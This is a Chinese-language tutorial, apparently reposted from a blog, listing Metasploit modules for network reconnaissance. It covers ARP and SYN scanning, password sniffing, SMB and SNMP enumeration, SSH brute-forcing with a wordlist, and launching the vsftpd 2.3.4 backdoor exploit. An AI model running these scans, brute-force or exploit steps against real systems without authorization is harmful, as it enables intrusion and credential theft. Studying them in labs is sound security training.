标签：ftp use scanner kali 几种 ssh msf smb auxiliary

基于tcp协议收集

1.利用tcp做信息收集
use auxiliary/scanner/discovery/arp_sweep
设置相关属性 rhosts：目标ip therads：线程数

2.半连接方式扫描停tcp接口
use auxiliary/scanner/portscan/syn
设置相关属性 rhosts therads

3.执行密码嗅探
search psnuffle
use auxiliary/sniffer/psnuffle

基于snmp协议收集
需要开启靶机的snmp才可以查询到，方法见文档
use auxiliary/scanner/snmp/snmp_enum

基于smb协议收集信息

扫描目标版本号
use auxiliary/scanner/smb/smb_version
设置rhosts目标ip 多个目标之间用逗号加空格隔开

如果要查看目标主机的共享文件的信息 需要提前打开目标主机的共享文件功能 文件 共享 设置

枚举目标主机共享的内容
use auxiliary/scanner/smb/smb_enumshares
show options

扫描系统用户信息 SID枚举
use auxiliary/scanner/smb/smb_lookupsid
show options

基于ssh协议收集信息

查看ssh服务的版本信息
use auxiliary/scanner/ssh/ssh_version
show options

对ssh暴力破解
use auxiliary/scanner/ssh/ssh_login
设置目标ip 设置字典路径 set USERPASS_FILE /usr/share/metasploitframework/data/wordlists/root_userpass.txt

基于FTP协议收集信息

加载ftp服务版本扫描模块
use auxiliary/scanner/ftp/ftp_version

拿到ftp版本号以后查询对应的攻击模块
search 2.3.4 寻找带ftp的攻击模块
use exploit/unix/ftp/vsftpd_234_backdoor
设置目标 run

标签：ftp,use,scanner,kali,几种,ssh,msf,smb,auxiliary
来源： https://blog.csdn.net/weixin_43894771/article/details/104729433

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。